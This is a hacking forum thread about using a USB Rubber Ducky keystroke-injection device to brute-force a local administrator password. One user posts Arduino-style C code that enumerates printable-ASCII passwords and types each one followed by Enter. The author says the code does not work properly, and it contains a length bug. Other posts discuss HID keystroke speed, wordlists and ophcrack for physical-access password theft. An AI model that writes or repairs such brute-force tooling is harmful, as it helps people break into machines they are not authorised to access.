[Version 1] Brute Forcing With The Ducky.

[Jonny_Walked]

Hey guys, I'm just wondering if I was able to make a code with Arduino to generate passwords, then use them to attempt to bruteforce an admin account locally. As in:

Generate password,

input "administrator" - (username)

tab,

input password value,

enter enter.

repeat until access is granted.

I am also considering using a wordlist, any links or even code on how to implement this would be great.

Thanks in advance.

[Mr-Protocol]

This is very possible.

All depends on your coding skills to have it generate passwords on the fly.

There are other alternatives to getting passwords though if you have physical access.

[Paul Stoffregen]

Even if the operating system does nothing to limit the speed of your guessing (which it easily can and certainly should), USB keyboards at 12 Mbit/sec are limited to 1000 state changes per second, due to the design of the HID protocol. Each keystroke is usually implemented as 2 events, a key down and key up.

[Mr-Protocol]

Varies more with the response time of the computer. Think of it as OLD SCHOOL programming when there were no "sleep" statements. it was just code your program to work in the speed limits of the computer.

[HaDAk]

I've been working on some code to do some brute forcing, but I can't seem to get it quite right. You're welcome to take a look at it, but if you fix it and get it working properly, I'd really appreciate it coming back to me.

// Simple Bruteforcer v0.1
// by HaDAk
// Special thanks to Kevin B. and Carl V.

  // Variables
  int ascii = 32; // 32 - 126
  int digit = 1;
  int blinkcount = 0;
  int MAX_PASSWORD = 32;
void setup() {

  // Blink when the ducky is first plugged in, to verify power to it.
  while(blinkcount < 2){
    blink(50);
    blinkcount++;
  }
  
  delay(1000); // wait a second
  hax(128);
}

void loop() {
  
}

void blink(int time){
  pinMode( PIN_D6, OUTPUT );    // set LED to super bright
  digitalWrite(PIN_D6, HIGH);   // LED on
  delay(time);                  // Slow blink
  digitalWrite(PIN_D6, LOW);    // LED off
  delay(time);
}

void enter(){ // Press the enter key, and release it
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void hax(int n){
    char curpw[MAX_PASSWORD];
    for(int i = 0; i < MAX_PASSWORD; ++i)
        curpw[i] = '\0';
    curpw[0] = 32;
    while(true)
    {
        try_password(curpw,n);
        curpw[0]++;
        char *test = &curpw[0];
        while (*test > (char)126)
        {
            if (curpw[MAX_PASSWORD-1] > (char)126)
            {
                return;
            }
            *test = 32;
            test++;
            (*test)++;
            if (*test < 32)
                *test = 32;
        }
    }    
}

void try_password(char* curpw, int n){
    for(int i=0;i<n;i++){
    Keyboard.print(curpw[i]);
  }
  delay(50);
  enter();
}

[h4x0r666]

is it also possible for the newer duckys? because normally i use ophcrack cd's and such.. but i just got my rubber ducky.. so that would even be better to just put it in and it immediatly starts bruteforcing!